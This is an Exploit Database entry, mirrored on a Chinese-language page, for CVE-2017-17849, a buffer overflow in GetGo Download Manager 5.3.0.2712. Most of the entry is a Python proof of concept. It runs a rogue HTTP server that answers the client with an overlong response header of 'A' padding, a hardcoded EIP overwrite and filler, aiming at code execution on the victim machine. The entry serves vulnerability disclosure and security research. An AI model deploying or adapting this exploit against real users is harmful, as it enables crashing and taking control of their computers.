GetGo Download Manager 5.3.0.2712 – Buffer Overflow

• Exploit Database
• 139 阅读

• 作者： Aloyce J. Makalanga
  日期： 2017-12-26
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43391/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58

  # Exploit Title: Buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 # CVE: CVE-2017-17849 # Date: 22-12-2017 # Tested on Windows 10 32 bits # Exploit Author: Aloyce J. Makalanga # Contact: https://twitter.com/aloycemjr # Software Link: http://www.getgosoft.com/getgodm/ # Category: webapps # Attack Type: Remote # Impact: Code Execution     1. Description   A buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution on the victim computer.   2. Proof of Concept     def main(): host = "192.168.205.128" port = 80   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, port)) s.listen(1) print "\n[+] Listening on %d ..." % port   cl, addr = s.accept() print "[+] Connection accepted from %s" % addr[0]   evilbuffer = "A" * 4105 hardCodedEIP= "\x69\x9E\x45\x76" #This is a hardcoded EIP just for demo . As you can see on the screenshot, we hit a breakpoint, right here on this EIP. Do you see our stack!!! You need to change this. pads= "C"*(6000 - len(evilbuffer + hardCodedEIP)) payload = evilbuffer + hardCodedEIP + pads   buffer = "HTTP/1.1 200 " + payload + "\r\n"   print cl.recv(1000) cl.send(buffer) print "[+] Sending buffer: OK\n"   sleep(3) cl.close() s.close()   if __name__ == '__main__': import socket from time import sleep main()   3. Solution:   No solution as of yet.